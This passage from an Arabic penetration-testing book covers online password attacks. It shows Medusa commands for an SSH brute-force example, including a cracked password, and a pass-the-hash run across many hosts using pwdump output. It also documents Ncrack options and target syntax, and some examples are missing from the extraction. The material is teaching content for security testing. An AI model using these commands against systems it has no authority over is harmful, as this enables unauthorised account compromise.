‫اﻵن ﺑﻌد أن أﺻﺑﺢ ﻟدﯾﻧﺎ ﻋﻧوان ‪ IP‬ﻟﻠﮭدف ﻣﻊ ﺑﻌض اﻟﺧدﻣﺎت اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد اﻟﻣﺻﺎدﻗﺔ )ﺳوف ﻧﻔﺗرض ‪SSH‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل(‪ ،‬ﻗﺎﻣوس‬
‫ﻛﻠﻣﺔ اﻟﻣرور واﺳم ﻣﺳﺗﺧدم واﺣد ﻋﻠﻰ اﻷﻗل‪ ،‬ﻓﻧﺣن ﻋﻠﻰ اﺳﺗﻌداد ﻟﺗﺷﻐﯾل ﻣﯾدوﺳﺎ‪ .‬ﻣن أﺟل ﺗﻧﻔﯾذ اﻟﮭﺟوم‪ ،‬ﯾﻣﻛﻧك ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر‬
‫اﻟﺗﺎﻟﻲ‪:‬‬

‫‪#medusa –h target_ip –u username –P path_to_password_dictionary –M authentication_service_to_attack‬‬

‫ﻧﺗوﻗف ﻟﺣظﺔ ھﻧﺎ ﻟدراﺳﺔ ھذا اﻷﻣر ﻣﻊ ﻣزﯾد ﻣن اﻟﺗﻔﺎﺻﯾل؛ ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﺧﺻﯾص اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭدف اﻟﺧﺎص ﺑك‪:‬‬
‫ﺣﯾث ﯾﺗم اﺳﺗﺧدام اﻟﻛﻠﻣﺔ اﻷوﻟﻰ "‪ " medusa‬ﻟﺑدء ﺑرﻧﺎﻣﺞ ‪ .brute forcing‬ﯾﺗم اﺳﺗﺧدام "‪ "-h‬ﻟﺗﺣدﯾد ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﮭدف‪ .‬ﯾﺗم‬
‫اﺳﺗﺧدام "‪ "-u‬ﻟﻠدﻻﻟﺔ ﻋﻠﻰ اﺳم ﻣﺳﺗﺧدم واﺣد اﻟﺗﻲ ﺳوف ﺗﺳﺗﺧدﻣﮫ ﻣﯾدوﺳﺎ ﻟﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ .‬إذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﺗرﻏب ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻠدﺧول ﻣﻊ ﻛل ﻣن اﻷﺳﻣﺎء اﻟواردة ﻓﻲ اﻟﻘﺎﺋﻣﺔ‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻟﺗﻌﺑﯾر "‪ " -U‬ﻣﺗﺑوﻋﺎ ﺑﻣﺳﺎر اﻟﻣﻠف اﻟذي‬
‫ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﮫ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬ﯾﺗم اﺳﺗﺧدام "‪ "-p‬ﻟﺗﺣدﯾد ﻛﻠﻣﺔ ﻣرور واﺣدة‪ ،‬ﻓﻲ ﺣﯾن ﯾﺗم اﺳﺗﺧدام "‪ "-P‬ﻟﺗﺣدﯾد ﻗﺎﺋﻣﺔ ﺗﺣﺗوي‬
‫ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور‪ "-P" .‬ﯾﺟب أن ﺗﻛون ﻣﺗﺑوﻋﺔ ﺑﺎﻟﻣوﻗﻊ اﻟﻔﻌﻠﻲ أو ﻣﺳﺎر ﻟﻣﻠف اﻟﻘﺎﻣوس‪ .‬ﯾﺗم اﺳﺗﺧدام "‪ "-M‬ﻟﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﺗﻲ‬
‫ﺗرﯾد ﻣﮭﺎﺟﻣﺗﮭﺎ‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام )‪ (-n port_number‬ﻟﺗﺧﺻﯾص رﻗم اﻟﻣﻧﻔذ‪.‬‬
‫ﻟﺗوﺿﯾﺢ ھذا اﻟﮭﺟوم‪ ،‬دﻋوﻧﺎ ﻧﺳﺗﺧدم ھذا اﻟﻣﺛﺎل‪ .‬ﻟﻧﻔﺗرض أﻧﻧﺎ ﻗد ﺗم اﻟﺗﻌﺎﻗد ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق ﺿد ﺷرﻛﺔ "‪ ."Example.com‬ﺧﻼل‬
‫ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﻟدﯾﻧﺎ ﻣﻊ ‪ ،MetaGoofil‬ﻓﻠﻘد اﻛﺗﺷﻔﻧﺎ ﻋن اﺳم اﻟﻣﺳﺗﺧدم "‪ "ownedb‬وﻋﻧوان ‪ IP‬ﻣن ‪ .192.168.18.132‬وﺑﻌد‬
‫ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭدف‪ ،‬ﻧﻛﺗﺷف أن اﻟﻣﻠﻘم ‪ SSH‬ﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻣﻧﻔذ ‪ .22‬ﺑﺎﻻﻧﺗﻘﺎل إﻟﻰ اﻟﺧطوة ‪ ،3‬واﺣدة ﻣن أول اﻷﺷﯾﺎء اﻟﻘﯾﺎم ﺑﮫ‬
‫ھو ﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم ‪ brute forcing‬ﻓﻲ طرﯾﻘﻧﺎ إﻟﻰ اﻟﻣﻠﻘم‪ .‬ﺑﻌد اﺷﺗﻌﺎل اﻟﺟﮭﺎز ھﺟوﻣﻧﺎ وﻓﺗﺢ ﻣﺣطﺔ‪ ،‬وﻧﺣن ﻹﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M ssh‬‬

‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗواﺟﮫ أي ﻣن اﻟﻣﺷﺎﻛل ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣﯾدوﺳﺎ )أو أي ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﺷﻣﻠﮭﺎ ھذا اﻟﻛﺗﺎب( ﻟﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ‬
‫اﻹﺻدار اﻟﺧﺎص ﺑك ﻣن ﻛﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﻗد ﯾﻛون ﻣن اﻟﻣﻔﯾد إﻋﺎدة ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ‪ .‬ﯾﻣﻛﻧك إﻋﺎدة ﺗﺛﺑﯾت ﻣﯾدوﺳﺎ ﻣﻊ اﻷواﻣر اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪#apt-get remove medusa‬‬
‫‪#apt-get update‬‬
‫‪#apt-get install medusa‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪371‬‬

‫ﯾظﮭر اﻟﺳطر اﻷول اﻷﻣر أﺻدرﻧﺎه ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ اﻟﺳﺎﺑﻖ؛ اﻟﺳطر اﻟﺛﺎﻧﻲ ھو راﯾﺔ إﻋﻼﻣﯾﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﻧدﻣﺎ ﯾﺑدأ اﻟﺑرﻧﺎﻣﺞ‬
‫اﻟﻌﻣل‪ .‬اﻷﺳطر اﻟﻣﺗﺑﻘﯾﺔ ﺗظﮭر ﺳﻠﺳﻠﺔ ﻣن ﻣﺣﺎوﻻت اﻟدﺧول اﻵﻟﻲ ﻣﻊ اﺳم اﻟﻣﺳﺗﺧدم " ‪ " ownedb‬وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺑدأ ب "‬
‫‪ .“ 123456‬ﻻﺣظ ﻓﻲ اﻟﺳطر ‪ 11‬ﺣﯾث ﯾوﺟد إﺷﻌﺎر ﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﺣﯾث ﻧﺟﺣت ﻣﯾدوﺳﺎ ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام اﺳم‬
‫ﻣﺳﺗﺧدم " ‪" ownedb‬وﻛﻠﻣﺔ ﻣرور)‪ . (Th3B@sics‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﺳﻧﻛون ﻗﺎدرﯾن ﻋﻠﻰ اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم ﻋن ﺑﻌد ﻣن ﺧﻼل ﻓﺗﺢ‬
‫اﻟﺗرﻣﻧﺎل واﻟﺗوﺻل إﻟﻰ اﻟﮭدف ﻋن طرﯾﻖ‪. SSH‬‬

‫ﯾﻣﻛﻧك اﯾﺿﺎ ﺗﺣﻣﯾل اﻷداة ﻣن ﺧﻼل اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬


‫‪http://h.foofus.net‬‬
‫اﺳﺘﺨﺪام ‪ Medusa‬ﻓﻲ ﻋﻤﻠﯿﺔ ‪Passing The Hash‬‬

‫ﻟﻘد ﻗﻣﻧﺎ ﻣن ﻗﺑل ﺑﺟﻣﻊ ﻋددا ﻣن ﻣﻠف‪ SAM‬وﻣﻠف ‪ .Pwdump‬ﺣﯾث ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ ‪ Medusa‬ﻗراءة ﻧﺎﺗﺞ ‪PWDump‬‬
‫وﻓﺣص ﻛل ﺣﺳﺎب ﺿد ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺿﯾﻔﯾن‪ .‬وﻣن اﻟﺟدﯾر ﺑﺎﻟذﻛر أن اﻟﻣﺋﺎت ﻣن اﻟﻧظم اﻟﻛﺛﯾرة ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻓﻲ ﺑﺿﻊ دﻗﺎﺋﻖ ﻓﻘط ﺑﺎﺳﺗﺧدام ھذا‬
‫اﻟﻧﮭﺞ‪.‬‬
‫‪#medusa -H hosts.txt -C pwdump.txt -M smbnt -m PASS:HASH‬‬

‫ﻟرؤﯾﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ﺑروﺗوﻛول ﻣﻌﯾن ﻣﻊ ‪ medusa‬ﯾﻣﻛﻧك ذﻟك ﻋن طرﯾﻖ اﺻدار اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل ﺣﯾث اﺳﺗﺧدﻣﻧﺎ ‪ ssh‬ﻛﻣﺛﺎل‬
‫ﻟﻠﺑروﺗوﻛول اﻟﺗﻲ ﻧرﯾد اﻻﺳﺗﻌﻼم ﻋﻧﮫ‪:‬‬
‫‪#medusa -M smbnt -q‬‬

‫‪Ncrack — Network Authentication Cracking Tool‬‬

‫اﻟﻣﺻدر‪http://nmap.org/ncrack:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪372‬‬

‫‪ Ncrack‬ھﻲ أداة ﻋﺎﻟﯾﺔ اﻟﺳرﻋﺔ ﻓﻲ ﻛﺳر ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ‪ .‬ﺗم ﺑﻧﺎؤھﺎ ﻟﻣﺳﺎﻋدة اﻟﺷرﻛﺎت ﻋﻠﻰ ﺗﺄﻣﯾن ﺷﺑﻛﺎﺗﮭم ﻋن طرﯾﻖ اﺧﺗﺑﺎر اﺳﺗﺑﺎﻗﻲ‬
‫ﻟﺟﻣﯾﻊ ﻣﺿﯾﻔﯾﮭم واﻷﺟﮭزة اﻟﻣﻧﺻﺑﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻣن اﺟل اﻟﻛﺷف ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻟﺿﻌﯾﻔﺔ‪/‬اﻟﺧﺎطﺋﺔ‪ .‬ﯾﻌﺗﻣد اﻟﻣﺗﺧﺻﺻﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن‬
‫أﯾﺿﺎ ﻋﻠﻰ ‪ Ncrack‬ﻋﻧد ﻓﺣص )‪ (auditing‬ﻋﻣﻼﺋﮭم‪" .‬اﻟﮭﺎﻛرز" أﺻﺑﺣوا اﻟﯾوم ﯾﺳﺗﺧدﻣوﻧﮭﺎ ﺑﺎﻟﺗوازي ﻣﻊ اداة اﻟﻔﺣص ‪ .Nmap‬ﺣﯾث اﻧﮫ‬
‫ﻋﻧد اﻟﻔﺣص ﺑﺄداة ‪ Nmap‬ﯾﻣﻛن ان ﯾﻛﺷف ﻟﻧﺎ ان اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ھو وﯾﻧدوز ﻣﻊ وﺟود ﺧدﻣﺔ ‪ ssh‬ﻣﻔﺗوﺣﺔ‪ ،‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﺳﺗﻌﯾن اﻟﮭﺎﻛر‬
‫أو ﻣﺧﺗﺑر اﻹﺧﺗراق ﺑﺄدوات اﻟﺗﺧﻣﯾن ﺣول ﻛﻠﻣﺎت اﻟﺳر ﻟﮭذه اﻟﺧدﻣﺎت )اﻟﺑروﺗوﻛوﻻت(‪.‬‬

‫ﻗد ﺗم ﺗﺻﻣﯾم ‪ Ncrack‬ﺑﺎﺳﺗﺧدام ﻧﮭﺞ اﻟوﺣدات)‪ ، (modular approach‬ﺑﻧﺎء ﺟﻣﻠﺔ ﺳطر اﻷواﻣر ﻣﺷﺎﺑﮭﺔ ل ‪ nmap‬وﻣﺣرك ‪Ncrack‬‬
‫)‪(dynamic engine‬اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺗﻛﯾف ﻣﻊ ﺣﺎﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ وﺗﻛون ﻗﺎﺋﻣﮫ ﻋﻠﻰ أﺳﺎس اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ اﻟﮭدف‪ .‬ﯾﻣﻛن‬
‫اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ ﻣن اﻟﻣﺿﯾﻔﯾن اﻟﻣﺗﻌددة‪.‬‬
‫ﯾﺗﻣﯾز ‪ Ncrack‬ﺑواﺟﮭﺔ ﻣرﻧﺔ ﻟﻠﻐﺎﯾﺔ ﻟﻣﻧﺢ اﻟﺗﺣﻛم اﻟﻛﺎﻣل ﻟﻠﻣﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺷﺑﻛﺔ‪ ،‬اﻟﺳﻣﺎح ل ھﺟﻣﺎت ‪ brute forcing‬اﻟﻣﺗطورة‬
‫واﻟﻣﻛﺛﻔﺔ ﻟﻠﻐﺎﯾﺔ‪ ،‬ﯾوﺟد ﻗواﻟب اﻟﺗوﻗﯾت )‪ (timing templates‬ﻟﺳﮭوﻟﺔ اﻻﺳﺗﺧدام‪ ،‬اﻟﺗﻔﺎﻋل وﻗت اﻟﺗﺷﻐﯾل ﻣﺛل ‪ Nmap‬وﻏﯾرھﺎ ﻣن اﻟﻛﺛﯾر ﻣن‬
‫اﻟﻣﻣﯾزات‪ .‬ﺗﺷﻣل اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت ﻛﺎﻻﺗﻰ‪:‬‬
‫‪RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet‬‬
‫ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻌﺎﻣﻼت اﻻﻓﺗراﺿﯾﺔ )‪ (default parameter‬ھﻲ ﻋﺎﻣﺔ ﻛﺎﻓﯾﺔ ﻟﺗﻐطﯾﺔ ﻛل اﻟﺣﺎﻻت ﺗﻘرﯾﺑﺎ‪ .‬ﻟﻛﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ وﺣدات‬
‫اﻟﮭﻧدﺳﺔ اﻟﻣﻌﻣﺎرﯾﺔ )‪ (modular architecture‬اﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺗﻣدﯾد اﻟدﻋم ﻟﺑروﺗوﻛوﻻت إﺿﺎﻓﯾﺔ ﻏﯾر اﻟﻣدرﺟﺔ ﺑﺳﮭوﻟﮫ‪.‬‬
‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ ھذه اﻷداة واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺟﻣﯾﻊ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑﻣﺎ ﻓﻲ ذﻟك اﻟوﯾﻧدوز وذﻟك ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://nmap.org/ncrack/‬‬
‫ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﺑﺎﺗﺑﺎع اﻻﺗﻲ‪:‬‬
‫‪Applications | Kali Linux | Password Attacks | Online Attacks | Ncrack.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻻﺳﺗﺧدام ھذه اﻷداة ﻛﺎﻻﺗﻰ‪:‬‬
‫}>‪#ncrack [<Options>] {<target specification‬‬
‫ﻣﺛﺎل ﻻﺳﺗﺧدام ھذا اﻻﻣر ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ ncrack‬ﺑدون أي ﻣن اﻟﻣﻌﺎﻣﻼت ﻓﺳوف ﯾﻘوم ﺑﻌرض ﺟﻣﯾﻊ اﻟﻣﻌﺎﻣﻼت اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ أﺷﮭر ھذه‬
‫اﻟﻣﻌﺎﻣﻼت ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪ :(-U‬ﻣﻠف اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫)‪ :(-P‬ﻣﻠف ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫)‪ :(--user‬اﺳم اﻟﻣﺳﺗﺧدم اﻟدى ﺗم ﺗﺧﻣﯾﻧﮫ ﺑﻧﺟﺎح‪.‬‬
‫)‪ :(--pass‬ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧﻣﯾﻧﮭﺎ ﺑﻧﺟﺎح‪.‬‬
‫)‪ :(--password-first‬ﻛرر اﻟﺗﺧﻣﯾن ﻟﻛل ﻣﺳﺗﺧدم ﻣن ﺧﻼل ﻣﻠف ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫)‪ :(-V‬ﻟﻠﺗﻌرف ﻋﻠﻰ اﺻدار اﻟﺗطﺑﯾﻖ‪.‬‬
‫)‪ :(-f‬اﻟﺗوﻗف اذا ﺗم إﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور واﺳم اﻟﻣﺳﺗﺧدم اﻟﺻﺣﯾﺣﺔ‪.‬‬
‫)‪ :(-6‬ﻟﺗﻔﻌﯾﺎ ﻓﺣص اﻟﻌﻧﺎوﯾن ﻣن اﻟﻧوع ‪.IPv6‬‬
‫‪Target Specification‬‬
‫ﯾﺗم اﻟﺗﻌﺎﻣل ﻣﻊ ﻛل ﺷﻲء ﻓﻲ ﺳطر أواﻣر ‪ Ncrack‬اﻟﺗﻲ ھﻲ ﻟﯾﺳت ﺧﯾﺎرا )‪ (options‬ﻋﻠﻰ اﻧﮫ اﻟﻣﺿﯾف اﻟﮭدف‪ .‬أﺑﺳط ﺷﻲء ھو ﺗﺣدﯾد‬
‫ﻋﻧوان ‪ IP‬ﻟﻠﮭدف أو اﺳم ﻣﺿﯾف‪ .‬ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻠﮭﺟوم ﻋﻠﻰ اﻷھداف اﻟﻣﺧﺗﺎرة‪ Ncrack .‬ﻣرن ﺟدا ﻓﻲ ﺗﻌرﯾﻔﮫ ﻟﻠﻣﺿﯾف‬
‫‪/‬اﻟﺧدﻣﺔ ﻣﺛل اﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻊ ‪.Nmap‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪373‬‬

‫‪ Ncrack‬ﯾدﻋم ﺗﻌرﯾف اﻛﺛر ﻣن ﻣﺿﯾف )‪ (multi hosts‬وﻻ ﯾﺷﺗرط ان ﯾﻛون ﻣن ﻧﻔس اﻟﻧوع وﯾدﻋم أﯾﺿﺎ ﻧطﺎق اﻟﺷﺑﻛﺎت و ﯾدﻋم أﯾﺿﺎ‬
‫‪ CIDR-style addressing‬واﻟﺗﻲ ﺳوف ﻧراه ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪.‬‬
‫‪#ncrack scanme.nmap.org 192.168.0.0/8 10.0.0,1,3-7.- -p22‬‬
‫وﻟﻛن ﯾوﺟد ﺑﻌض اﻟﻣﻌﺎﻣﻼت اﻟﺗﻲ ﯾﻣﻛن اﻟﺗﺣﻛم ﻓﻲ ﺗﻌرﯾف ‪ Ncrack‬ﻟﻠﻣﺿﯾﻔﯾن ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪-iX <inputfilename> (Input from Nmap's -oX XML output format‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر ‪ Nmap‬ﻓﻲ ﺻورة ‪.xml‬‬
‫)‪-iN <inputfilename> (Input from Nmap's -oN Normal output format‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر ‪ Nmap‬ﻓﻲ ﺻورﺗﮫ اﻟﻌﺎدﯾﺔ‪.‬‬
‫)‪-iL <inputfilename> (Input from list‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻠف اﻟﻣﺣدد‪.‬‬
‫)‪--exclude <host1>[, <host2>[, ...]] (Exclude hosts/networks‬‬
‫ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن‪.‬‬
‫)‪--excludefile <exclude_file> (Exclude list from file‬‬
‫ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن واﻟﺗﻲ ﺗﻛون ﻣﺗوﻓرة ﻓﻲ ﻣﻠف‪.‬‬
‫‪Service Specification‬‬
‫ﯾﻣﻛن إﺟراء أي ﺟﻠﺳﺔ اﺧﺗراق ﻣﻊ اﻟﮭدف ﻣن دون ﺗﻛﺳﯾر ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﻟﻣﮭﺎﺟﻣﺗﮫ‪ .‬ﺗﻌرﯾف اﻟﺧدﻣﺔ ھﻲ واﺣدة ﻣن اﻟﻧظم اﻟﻔرﻋﯾﺔ اﻷﻛﺛر ﻣروﻧﺔ‬
‫ﻣن ‪ Ncrack‬ﺣﯾث ﯾﺗﻌﺎون ﻣﻊ ﺗﻌرﯾف اﻟﻣﺳﺗﮭدﻓﺔ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﺗرﻛﯾب ﺧﯾﺎرات ﻣﺧﺗﻠﻔﺔ ﻟﯾﺗم ﺗطﺑﯾﻘﮭﺎ‪ .‬ﻟﺑدء ﺗﺷﻐﯾل ‪ ،Ncrack‬ﻓﺈﻧك ﺳوف‬
‫ﺗﺣﺗﺎج ﻋﻠﻰ اﻻﻗل ﺗﺣدﯾد ﻣﺿﯾف واﺣد ورﺑطﮫ ﺑﺧدﻣﺔ واﺣدة ﻟﻠﮭﺟوم‪ .‬ﯾوﻓر ‪ Ncrack‬طرق ﻟﺗﺣدﯾد اﻟﺧدﻣﺔ ﻋن طرﯾﻖ رﻗم اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ‬
‫اﻟﺧﺎص ﺑﮫ‪ ،‬او ﻣن ﺧﻼل اﺳﻣﮭﺎ )ﻛﻣﺎ ھﻲ ﻣﺳﺗﺧرﺟﺔ ﻓﻲ اﻟﻣﻠف‪ (ncrack-services‬أو ﻛﻠﯾﮭﻣﺎ‪ .‬ﻋﺎدة‪ ،‬ﺗﺣﺗﺎج إﻟﻰ ﺗﻌرﯾف ﻛل ﻣن اﺳم ورﻗم‬
‫اﻟﻣﻧﻔذ ﺣﺎﻟﺔ ﺧﺎﺻﺔ ﺣﯾث ﺗﻌﻠﻣون أن ﯾﻣﻛن ﺟﻌل ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﺗﺳﺗﺧدم ﻣﻧﻔذ ﻏﯾر اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ ﻟﮭﺎ‪.‬‬
‫ﯾﻘدم ‪ Ncrack‬طرﯾﻘﺗﺎن ﻣﺗﻣﯾزﺗﺎ واﻟﺗﻲ ﺳﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺧدﻣﺎت اﻟﮭدف وھﻣﺎ‪:‬‬
‫‪per-host service specification -1‬‬
‫‪global specification -2‬‬
‫‪Per-host service specification‬‬
‫ﯾﺗم ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻓﻲ ھذا اﻟوﺿﻊ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺧدﻣﺔ ﺑﺟﺎﻧب اﻟﻣﺿﯾف اﻟﮭدف ﺣﯾث ﺗﻛون ﻣﺣدده ﻟﮭذا اﻟﻣﺿﯾف وﺗﻧطﺑﻖ ﻋﻠﯾﮫ ﻓﻘط‪ .‬وﻟﻛن‬
‫ﯾﺟب ان ﻧﺄﺧذ ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬أﻧﮫ ﻋﻧد ﺗﺣدﯾد اﻟﮭدف ﻓﺎﻧﮫ ﯾﺳﻣﺢ ﺑﺎﺳﺗﺧدام ‪) wildcards‬اﻟرﻣوز( و‪ netmask‬وھذا ﯾﻌﻧﻲ أﻧﮫ ﻋﻧد ﺗطﺑﯾﻖ ﺻﯾﻐﺔ‬
‫ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻛل ﻣﺿﯾف ﻋﻠﻰ ھذا ﻓﺎﻧﮫ ﺳوف ﯾﺷﻣل اﻟﺟﻣﯾﻊ‪ .‬اﻟﺷﻛل اﻟﻌﺎم ﻛﺎﻻﺗﻰ‪:‬‬
‫>]‪<[service-name]>://<target>:<[port-number‬‬
‫ﻣﺛﺎل ﻋﻠﻰ ذﻟك ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Global service specification‬‬


‫ﯾﺗم ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻓﻲ ھذا اﻟوﺿﻊ ﻟﺟﻣﯾﻊ اﻷﺟﮭزة اﻟﻣﺿﯾﻔﺔ اﻟﺗﻲ ﻟم ﺗﺗراﻓﻖ ﻣﻊ ﺗﻧﺳﯾﻖ اﻟﺧدﻣﺔ ﻟﻛل اﻟﻣﺿﯾف‪. Per-host service specification‬‬
‫وﯾﺗم ذﻟك ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر)‪ .(-P‬ﯾﻣﻛن ﺗﺣدﯾد أﻛﺛر ﻣن ﺧدﻣﮫ ﺑﺎﺳﺗﺧدام اﻟﻔﺎﺻﻠﺔ ﻟﻠﻔﺻل ﺑﯾﻧﮭم‪ .‬اﻟﺷﻛل اﻟﻌﺎم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪-p <[service1]>:<[port-number1]>,<[service2]>:<[port-number2]>,...‬‬
‫ﻣﺛﺎل ﻋﻠﻰ ذﻟك ﻛﺎﻻﺗﻰ‪:‬‬

